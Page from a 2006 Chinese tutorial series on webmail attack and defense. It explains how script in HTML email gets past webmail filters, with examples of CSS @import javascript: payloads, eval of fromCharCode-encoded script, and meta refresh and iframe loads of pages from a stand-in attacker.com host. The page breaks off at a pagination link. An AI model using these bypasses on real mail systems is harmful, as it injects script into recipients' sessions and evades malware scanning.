WEB开发网
开发学院网络安全黑客技术 Webmail攻防实战 阅读

Webmail攻防实战

 2006-11-05 20:35:03 来源:WEB开发网   
核心提示: 例如:<style type="text/css"><!--@import url(javascript:alert('JavaScript#1 is executed'));@import url(http://www.attacker.com/js.

例如:<style type="text/css">
<!--
@import url(javascript:alert('JavaScript#1 is executed'));
@import url(http://www.attacker.com/js.css);
-->
</style>

其中http://www.attacker.com/js.css的内容如下所示:

@import url(javascript:alert('JavaScript#2 is executed'));
@import url(javascript:eval(String.fromCharCode
(97,108,101,114,116,40,39,84,101,115,116,32,49,39,41,59,97,
108,101,114,116,40,39,84,101,115,116,32,50,39,41,59)));

能够绕过WebMail系统对脚本程序过滤的方法远不止上面所说的这些,例如曾有人发现把“<script>”标签改成“<_a<script>”和“<<script>”的样子能绕过yahoo电邮的过滤,这个漏洞yahoo在最近才改正过来。

除了可以在html邮件中直接嵌入脚本程序外,攻击者还可以设计一些html代码,在用户打开html邮件时,不知不觉引入另一个html文件,而此文件中正含有恶性代码,这样不仅能直接绕过WebMail系统对脚本程序的过滤,而且还能有效避开提供了防毒服务的邮件系统对恶性代码的查杀。下面是几个调用html文件的例子:

(1) Refresh到另一个页面:

<body>
<meta http-equiv="refresh" content="1;URL=http://www.attacker.com/another.htm">
</body>

(2) Iframe引入另一个页面:

<body>
<iframe src="http://www.attacker.com/import.htm" frameborder="0"></iframe>
</body>

(3) scriptlet引入另一个页面:

上一页  4 5 6 7 8 9 10  下一页

Tags:Webmail 攻防 实战

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接